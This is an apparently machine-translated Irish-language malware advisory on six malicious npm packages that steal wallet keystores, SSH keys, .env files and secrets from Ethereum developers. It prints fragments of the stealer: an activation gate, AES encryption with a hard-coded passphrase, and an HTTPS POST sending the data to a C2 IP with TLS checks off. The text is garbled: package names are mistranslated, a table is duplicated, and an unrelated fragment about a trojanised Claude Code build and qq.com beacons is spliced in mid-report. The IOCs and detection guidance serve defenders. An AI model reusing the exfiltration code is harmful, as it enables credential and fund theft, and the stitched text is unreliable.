TL; DR
Ar an 6 Bealtaine 2026, foilsitheoir npm aonair, namikazesarada010206, bhrúigh sé phacáiste mailíseach a dhírigh ar éiceachóras forbróirí Ethereum, Solidity, agus DeFi.
Na pacáistí, viem-core, viem-utils-core, hardhat-core-utils, evm-utils, foundry-utils, agus web3-utils-core, d'úsáid siad ainmneacha inchreidte a bhí deartha le breathnú cosúil le leabharlanna cúnta le haghaidh uirlisí coitianta Web3.
Bhí an rud céanna sna sé phacáiste telemetry.js comhad. Bhí an comhad comhionann le beart ar fud an chnuasaigh, le SHA-256:
Ní ritheann an malware ag am suiteála. Níl aon preinstall or postinstall crúca. Ina áit sin, gníomhaíonn sé nuair a allmhairítear an pacáiste tríd require().
Tá tábhacht leis an mionsonra sin.
Fanann an t-ionchlannán go dtí go n-úsáideann forbróir an pacáiste i ndáiríre. Ansin seiceálann sé an bhfuil cuma fíor-thimpeallacht forbartha Ethereum / Solidity ar an stáisiún oibre. Lorgaíonn sé eochracha Alchemy nó Infura, eochracha príobháideacha, mnemonics, eochracha imscartha, nó eolaire áitiúil Foundry.
Má mheaitseálann an t-óstach, bailíonn an goideoir eochracha príobháideacha SSH, stórais eochracha sparán Foundry / Geth / Brownie, .env* comhaid, agus athróga timpeallachta íogaire. Criptíonn sé an pacáiste le AES-256-GCM ag baint úsáide as frása faire crua-chódaithe agus eis-scagthaíonn sé é chuig críochphointe IPv4 C2 amh le fíorú TLS díchumasaithe.
Dheimhnigh córas Rabhaidh Luath Malware (MEW) Xygeni go raibh na sé phacáiste mailíseach. Tá an pacáiste tuarascála bainte síos clárlainne npm ar feitheamh.
An Braisle: Sé Phacáiste, Foilsitheoir Amháin
Cuntas an fhoilsitheora namikazesarada010206 bhí nasctha leis an seoladh Gmail neamhfhíoraithe namikazesarada010206@gmail.com.
Foilsíodh an feachtas mar phléasc foilseacháin aon lae ar an 6 Bealtaine 2026. Rinneadh leaganacha de na sé phacáiste mar seo a leanas: 1.0.0, ní raibh aon spleáchais rith-ama aige, agus níor sheol sé ach trí chomhad:
package.json index.js telemetry.js D’fhógair siad an stór foinse céanna freisin:
https://github.com/harunosakura030303-maker/evmchain-config Gabhadh na chéad trí phacáiste ag scanóirí MEW ar an gcéad fhoilsiú. Cuireadh bratach fhoréigneach ar na trí cinn eile tar éis athbhreithniú anailísithe ar phróifíl npm an fhoilsitheora. Nuair a bhí an phróifíl chéanna comhionann le beart amháin. telemetry.js deimhníodh ar fud an chnuasaigh, dúnadh iad mar mailíseach de réir comhsheasmhachta.
| Pacáiste | Leagan | npm Foilsithe | Ticéad MEW | Fíorasc |
|---|---|---|---|---|
| croí-viem | 1.0.0 | 2026-05-06 01:38:44Z | #51049 | Mailíseacha |
| croí-viem-utils | 1.0.0 | 2026-05-06 | #51050 | Mailíseacha |
| utils croí-chrua-hat | 1.0.0 | 2026-05-06 | #51051 | Mailíseacha |
| evm-utils | 1.0.0 | 2026-05-06 | #51069 | Mailíseach, de réir comhsheasmhachta |
| teilgcheárta-utils | 1.0.0 | 2026-05-06 | #51071 | Mailíseach, de réir comhsheasmhachta |
| croí-utilí-web3 | 1.0.0 | 2026-05-06 | #51070 | Mailíseach, de réir comhsheasmhachta |
Tá an straitéis ainmniúcháin simplí ach éifeachtach.
Ní dhéanann na pacáistí seo aithris ar ainmneacha cruinne suas an sruth. Ina áit sin, úsáideann siad iarmhíreanna “fóntais” inchreidte amhail -core, -utils, agus -utils-coreFágann sin go bhfuil cuma leabharlanna comhlacha orthu a mbeifeá ag súil le feiceáil gar d’uirlisí Web3.
| Pacáiste Mailíseach | Sprioc Dhlisteanach |
|---|---|
| croí-viem | viem, cliant coitianta Ethereum TypeScript |
| croí-viem-utils | viem |
| utils croí-chrua-hat | hardhat, timpeallacht forbartha príomhshrutha Solidity |
| evm-utils | Ainmspás uirlisí EVM cineálach |
| teilgcheárta-utils | teilgcheárta, slabhra uirlisí Solidity |
| croí-utilí-web3 | web3-utils, cúntóirí Web3.js |
Seo patrún an “phacáiste forlíontaigh”: ní “Is mise an fíorphacáiste,” ach “Táim cosúil le cúntóir réasúnta timpeall an fhíorphacáiste.”
I gcás forbróirí DeFi atá ag bogadh go tapa, is leor sin chun riosca a chruthú.
Cad a Tharlaíonn Nuair a Allmhairítear an Pacáiste
Tá an slabhra ionsaithe beag, d'aon ghnó, agus dírithe ar thimpeallachtaí forbartha cripte.
Níl aon crúca suiteála ann. Ina áit sin, tá index.js a easpórtálann feidhmiúlacht stub agus ansin luchtóidh an modúl teileamaitreachta mailíseach.
require('./telemetry').init(); Ciallaíonn sé seo go ngníomhaíonn an malware ar an gcéad allmhairiú.
Tá sin úsáideach ó thaobh oibríochta de don ionsaitheoir. Díríonn go leor scanóirí agus boscaí gainimh ar iompar ag am suiteála. Fanann an pacáiste seo go dtí go n-úsáideann forbróir, script tógála, sraith tástála, nó cosán ama rithe é i ndáiríre.
Geata Gníomhachtaithe: Ní féidir é a úsáid ach ar Stáisiúin Oibre Forbróirí Web3 Fíor
Is é an geata gníomhachtaithe an chuid is tábhachtaí den ionchlannán.
Déanann an malware seiceáil ar athróga comhshaoil a fhaightear go coitianta ar mheaisíní forbróirí Ethereum / Solidity:
const indicators = [ process.env.ALCHEMY_API_KEY, process.env.INFURA_KEY, process.env.PRIVATE_KEY, process.env.MNEMONIC, process.env.DEPLOYER_KEY, ].filter(Boolean); Seiceálann sé freisin an bhfuil cuma air go bhfuil Foundry suiteáilte:
fs.existsSync(path.join(os.homedir(), '.foundry')) Mura bhfuil ceachtar coinníoll fíor, filleann an fheidhm agus ní dhéanann sí tada.
Fágann sin go bhfuil an pacáiste níos ciúine i dtimpeallachtaí anailíse cineálacha. D’fhéadfadh bosca gainimh gan Foundry, eochracha Alchemy, eochracha Infura, eochracha príobháideacha, nó mnemonics a bheith ina allmhairiú atá neamhdhíobhálach.
Ar óstach meaitseála, fanann an malware 60 go 90 soicind sula mbailítear é:
setTimeout(() => { try { _collect(); } catch {} }, 60000 + Math.random() * 30000).unref(); Laghdaíonn an mhoill an comhghaol soiléir idir allmhairiú agus eis-scagadh. .unref() Ligeann call don phróiseas óstach scoir de ghnáth freisin má allmhairíodh an pacáiste i script gearrshaolach.
Ní iompar torannach smash-and-grab é seo. Is goid spriocdhírithe é atá deartha chun gan rith mura bhfuil an timpeallacht forbróra fiúntach goid uaidh.
Cad a bhailíonn an Goideoir
Nuair a théann an geata gníomhachtaithe thart, bailíonn an malware ó na foinsí is tábhachtaí i bhforbairt Web3: eochracha príobháideacha, stórais eochracha sparán, dintiúir imscartha, rúin scamall, comharthaí npm, agus cumraíocht tionscadail áitiúil.
| Foinse | Cad a Bhailítear |
|---|---|
| próiseas.timpeallacht | Aon athróg a mheaitseálann /TOKEN|SECRET|ECHALL|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i |
| ~/.ssh/* | Comhaid ina bhfuil PRIVATE EOCHAIR nó BEGIN OPENSSH, lena n-áirítear ábhar iomlán an chomhaid |
| ~/.foundry/eochracha/* | Comhaid stórais eochrach sparán Foundry |
| ~/.ethereum/eochairstóras/* | Comhaid stórais eochrach sparán Geth |
| ~/.brownie/cuntais/* | Comhaid stórais eochrach sparán Brownie |
| ${cwd}/.env | Ábhar iomlán an chomhaid |
| ${cwd}/.crios.áitiúil | Ábhar iomlán an chomhaid |
| ${cwd}/.env.production | Ábhar iomlán an chomhaid |
| ${cwd}/.env.development | Ábhar iomlán an chomhaid |
| os.hostname() | Meiteashonraí óstach |
| cripte.randomUUID() | Aitheantóir íospartaigh/seisiúin |
| Dáta.anois() | Stampa ama bailiúcháin |
otheve.beacon.qq.com oth.str.beacon.qq.com h.trace.qq.com Is iad na comharthaí ATTA:
ATTA_ID 00400014144 ATTA_TOKEN 6478159937 Ní raibh muid in ann a dhearbhú an raibh an teileamaitríocht de chuid anailísíochta an oibreora féin nó cainéal monetaithe ar leithligh. Tá na comharthaí ATTA mar an gcéanna sa dá shampla a scrúdaíomar.
Braisle B: heibai
claude.hk Fioscaireacht OAuth + Fuadach URL ANTHROPIC_BASE
Is é sampla an 1 Aibreán an chuid is garbh agus is luaithe den fheachtas.
heibai:2.1.88-claude.hk-4 foilsithe ag wuguoqiangvip28, cuntas a cruthaíodh 7 Meitheamh, 2025. Rinne an pacáiste leagan soiléir de féin i gcoinne an dlí dhlisteanaigh 2.1.88 Scaoileadh antrapach.
Ní chuireann sé isteach ar MITM CA-cert. Ina áit sin, insíonn sé bréag don úsáideoir faoin gcríochphointe OAuth.
Áirítear ar na breiseanna mailíseacha anuas ar fhoinse sceite Claude Code:
| Foinse | Cad a Bhailítear |
|---|---|
| próiseas.timpeallacht | Aon athróg a mheaitseálann /TOKEN|SECRET|ECHALL|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i |
| ~/.ssh/* | Comhaid ina bhfuil PRIVATE EOCHAIR nó BEGIN OPENSSH, lena n-áirítear ábhar iomlán an chomhaid |
| ~/.foundry/eochracha/* | Comhaid stórais eochrach sparán Foundry |
| ~/.ethereum/eochairstóras/* | Comhaid stórais eochrach sparán Geth |
| ~/.brownie/cuntais/* | Comhaid stórais eochrach sparán Brownie |
| ${cwd}/.env | Ábhar iomlán an chomhaid |
| ${cwd}/.crios.áitiúil | Ábhar iomlán an chomhaid |
| ${cwd}/.env.production | Ábhar iomlán an chomhaid |
| ${cwd}/.env.development | Ábhar iomlán an chomhaid |
| os.hostname() | Meiteashonraí óstach |
| cripte.randomUUID() | Aitheantóir íospartaigh/seisiúin |
| Dáta.anois() | Stampa ama bailiúcháin |
Tá an liosta sprice an-sonrach. Ní goid brabhsálaí cineálach ná scríobadh leathan dintiúir atá i gceist anseo. Tá sé dírithe ar fhorbróirí a thógann, a thástálann, a imscarann nó a oibríonn feidhmchláir Ethereum.
Tá tábhacht ar leith ag baint le stórais eochracha Foundry, Geth, agus Brownie a áireamh. Is féidir leis na comhaid seo rochtain dhíreach ar sparán nó ar chéannachtaí imscartha a léiriú. Má tá an t-ionsaitheoir in ann iad a phéireáil le pasfhocail, mnemonics, nó rúin chomhshaoil, féadfaidh siad cistí a bhogadh, aithris a dhéanamh ar imscaradóirí, nó oibríochtaí conarthaí cliste a chur i mbaol.
Criptiú Roimh Eas-Scaipeadh
Criptíonn an malware na sonraí bailithe sula seoltar amach iad.
const key = crypto.createHash('sha256').update(K).digest(); const iv = crypto.randomBytes(12); const cipher = crypto.createCipheriv('aes-256-gcm', key, iv); Is é seo an frása faire crua-chódaithe:
a]3Fk9$mP2xL7vQ8nR4wJ6yB0tH5cE1d Tá an t-ualach deiridh fillte mar JSON:
{"v":2,"iv":"<base64>","d":"<base64-ciphertext>","t":"<base64-gcm-tag>"} Ní dhéanann criptiú an malware níos forbartha leis féin. Mar sin féin, déanann sé iniúchadh líonra níos deacra. D’fheicfeadh cosantóir a bheadh ag faire ar imeacht ualach JSON, ach ní fheicfeadh sé na heochracha goidte, na comhaid sparán, ná... .env ábhar gan an frása faire crua-chódáilte agus an loighic dhíchriptithe.
Eas-scaipeadh chuig IPv4 C2 Amh
Tá an cosán eis-scagtha crua-chódaithe:
const req = https.request({ hostname: '76.13.37.80', port: 8443, path: '/api/v1/telemetry', method: 'POST', headers: { 'Content-Type': 'application/json', ... }, rejectUnauthorized: false, timeout: 8000, }, () => {}); Seolann an malware sonraí chuig:
https://76.13.37.80:8443/api/v1/telemetry Seasann dhá shonra amach.
Ar dtús, is seoladh IPv4 lom é an C2 seachas fearann. Baintear an gá atá le clárú fearainn leis sin agus seachnaítear roinnt braite fearainn-bhunaithe.
Ar an dara dul síos, díchumasaítear fíorú TLS le:
rejectUnauthorized: false Ligeann sé sin don bhogearraí mailíseacha glacadh le haon deimhniú, lena n-áirítear deimhnithe féinshínithe. Is é sin le rá, faigheann an t-ionsaitheoir iompar criptithe gan deimhniú poiblí bailí a bheith ag teastáil uaidh.
Níl aon loighic athiarrachta ná aon óstach cúltaca ann. Slogtar earráidí go ciúin. Coinníonn sé seo an pacáiste ciúin mura bhfuil an C2 as líne nó mura féidir teacht air.
Cén Fáth a bhfuil Tábhacht ag baint leis an bhFeachtas Seo
Bíonn formhór na bpacáistí npm mailíseacha atá dírithe ar fhorbróirí ag iarraidh dintiúir leathana a leanúint: comharthaí npm, eochracha AWS, comharthaí GitHub, nó .npmrc comhaid.
Cúngaíonn an feachtas seo an sprioc.
Lorgaíonn sé comharthaí gur le forbróir Ethereum nó Solidity an meaisín. Ansin tarraingíonn sé na sócmhainní atá tábhachtach sa timpeallacht sin go díreach: stórais eochracha sparán, eochracha príobháideacha, mnemonics, eochracha imscartha, .env comhaid, agus eochracha SSH.
Fágann sin go bhfuil an feachtas níos contúirtí do fhoirne Web3 ná goid npm cineálach.
D’fhéadfadh ionfhabhtú rathúil nochtadh a dhéanamh ar:
- Sparán imscartha
- Eochracha riarthóra conartha cliste
- Eochracha soláthraí RPC
- Dintiúir imscartha scamall
- comharthaí foilsitheoireachta npm
- Rochtain SSH ar bhonneagar forbróra nó tógála
- Rúin tionscadail stóráilte i
.envComhaid - Stórais eochracha sparán le haghaidh Foundry, Geth, nó Brownie
Léiríonn ainmneacha na bpacáistí innealtóireacht shóisialta shoiléir freisin. Díríonn siad ar éiceachóras forbróirí Web3 trí ainmneacha uirlisí aitheanta: viem, hardhat, foundry, evm, agus web3.
Ní gá don aisteoir comhréiteach a dhéanamh maidir leis na tionscadail iarbhír. Ní theastaíonn uathu ach forbróir chun rud a shuiteáil a bhfuil cuma phacáiste réasúnta air.
Táscairí Comhréitigh agus Braite
| Pacáistí agus Foilsitheoir | |
|---|---|
| Réimse | luach |
| foilsitheoir npm | namikazesarada010206 |
| Ríomhphost an fhoilsitheora | namikazesarada010206@gmail.com |
| Ríomhphost fíoraithe | Uimh |
| SCM fíoraithe | Uimh |
| Scór clú | 1.0 |
| Pacáistí | viem-core, viem-utils-core, hardhat-core-utils, evm-utils, teilgcheárta-utils, web3-utils-core |
| leaganacha | Gach 1.0.0 |
| Stór foinse | https://github.com/harunosakura030303-maker/evmchain-config |
| Deimhnithe mailíseach | Na sé phacáiste go léir |
| líonra | |
|---|---|
| Cineál | luach |
| Críochphointe C2 | https://76.13.37.80:8443/api/v1/telemetry |
| C2 IP | 76.13.37.80 |
| Calafort C2 | 8443/tcp |
| Iompar TLS | diúltaighGan Údarú: bréagach |
| Scéim ualaigh | {"v":2,"iv": "d": "t": } |
| Comhaid agus Hashes | |
|---|---|
| Cineál | luach |
| teileamaitríocht.js SHA-256 | 71426e93cb6143052d5aeeca920850f8a0343c95bc65aab9a15145848cc5bff1 |
| Leagan amach an phacáiste | pacáiste.json, innéacs.js, teileamaitríocht.js |
| Comhaireamh comhaid | 3 |
| Méid iomlán garbh | 3.4 kB |
Comharthaí Gníomhachtaithe
Déanann an malware seiceáil ar na hathróga comhshaoil seo:
ALCHEMY_API_KEY INFURA_KEY PRIVATE_KEY MNEMONIC DEPLOYER_KEY Seiceálann sé freisin le haghaidh:
~/.foundry/ Cosáin Óstacha Spriocdhírithe
~/.ssh/* ~/.foundry/keystores/* ~/.ethereum/keystore/* ~/.brownie/accounts/* ${cwd}/.env ${cwd}/.env.local ${cwd}/.env.production ${cwd}/.env.development Bailiúchán Regex
/TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i Nótaí Braite
Gabhann roinnt rialacha an feachtas seo gan anailís iompraíochta iomlán a bheith ag teastáil.
Ar dtús, scanadh comhaid ghlasála le haghaidh na sé ainm pacáiste mailíseacha:
viem-core viem-utils-core hardhat-core-utils evm-utils foundry-utils web3-utils-core Aon chluiche i package-lock.json, yarn.lock, pnpm-lock.yaml, Nó node_modules ba chóir stair a láimhseáil mar eachtra thromchúiseach.
Ar an dara dul síos, déan monatóireacht ar phróisis Node.js ag léamh cosáin stórais eochrach sparán:
~/.foundry/keystores/ ~/.ethereum/keystore/ ~/.brownie/accounts/ Is annamh a bhíonn an iompar seo dlisteanach i gcás pacáiste a allmhairítear mar spleáchas cúnta. Bíonn sé thar a bheith amhrasach nuair a leanann gníomhaíocht líonra amach é.
Sa tríú háit, blocáil nó foláireamh a thabhairt ar naisc HTTPS chuig:
76.13.37.80:8443 Go háirithe nuair is é an cosán iarratais:
/api/v1/telemetry Ceathrú, déan cuardach ar phacáistí npm a chomhcheanglaíonn na tréithe seo:
- Foilsitheoir úr nó foilsitheoir ísealcháil
- Cuntas Gmail neamhfhíoraithe
- Ainm pacáiste atá cóngarach do Web3
- Gan aon stair stórtha bríoch
- Leagan amach pacáiste beag bídeach
index.jsa luchtóidh comhad teileamaitreachta nó cúnta- Gan aon spleáchais rith-ama
- Bailiúchán athróg timpeallachta íogair
- Rochtain ar stór eochrach sparán
Tá an patrún seo níos úsáidí ná IOC aonair mar go bhféadfadh an chéad phacáiste eile an seoladh IP a athrú ach an loighic spriocdhírithe chéanna a choinneáil.
Liosta Seiceála Freagartha Comhréitigh
Má d'úsáid forbróir ceann de na sé phacáiste agus má chomhlíon a dtimpeallacht an geata gníomhachtaithe, measadh go raibh an stáisiún oibre i mbaol.
Áirítear leis sin meaisíní a bhfuil Foundry suiteáilte orthu, eochracha Alchemy nó Infura sa timpeallacht, eochracha príobháideacha, mnemonics, nó eochracha imscartha.
Freagra molta:
- Dícheangail an t-óstach ón líonra.
- Coinnigh
node_modules, comhaid ghlasála, stair bhlaosc, agus logaí ábhartha le haghaidh fóiréinseach. - Rothlaigh gach péire eochracha SSH faoi
~/.ssh/. - Rothlaigh eochracha sparán do gach stór eochrach faoi
~/.foundry,~/.ethereum, agus~/.brownie. - Bog cistí chuig sparán úra.
- Rothlaigh gach rún atá stóráilte i
.env*comhaid i stórtha inar oibrigh an forbróir. - Rothlaigh rúin chomhshaoil a mheaitseálann an regex bailiúcháin, lena n-áirítear eochracha AWS, comharthaí npm, comharthaí imscartha, eochracha API, eochracha príobháideacha, síolta, agus mnemonics.
- Déan iniúchadh ar ghníomhaíocht scamall, npm, GitHub, soláthraí RPC, agus blockchain ó suiteáladh an pacáiste den chéad uair.
- Ath-íomháigh an stáisiún oibre sula n-athúsáidtear é.
Cad ba Chóir do Chosantóirí a Thabhairt Leat
Léiríonn an feachtas seo an chaoi a bhfuil npm typosquatting ag teacht chun cinn timpeall ar éiceachórais forbróirí ardluacha.
Ní raibh gá le buanseasmhacht ón aisteoir. Ní raibh gá le doiléire. Ní raibh gá fiú le forghníomhú ag am suiteála.
Ina áit sin, bhí siad ag brath ar thrí rud:
- Ainmneacha pacáiste Web3 inchreidte
- Gníomhachtú ar mheaisíní cripte-fhorbartha fíor amháin
- Goid dhíreach na gcomhad agus na rúin is tábhachtaí do fhorbróirí Ethereum
Fágann sin go bhfuil sé furasta an feachtas a chailleadh i scanadh leathan agus go bhfuil sé contúirteach nuair a thuirlingíonn sé sa timpeallacht cheart.
I gcás foirne Web3, tá an ceacht soiléir: déan ainmneacha spleáchais a chóireáil mar chuid de do mhúnla bagairtí. Is féidir le pacáiste a bhfuil cuma chúntóra neamhdhíobhálach air a bheith ina chonair is giorra fós chun an sparán a chur i mbaol.
Tuairiscíodh chuig an gclárlann npm é. Déanfaimid an post seo a nuashonrú nuair a bhainfear cuntas agus pacáistí an fhoilsitheora.




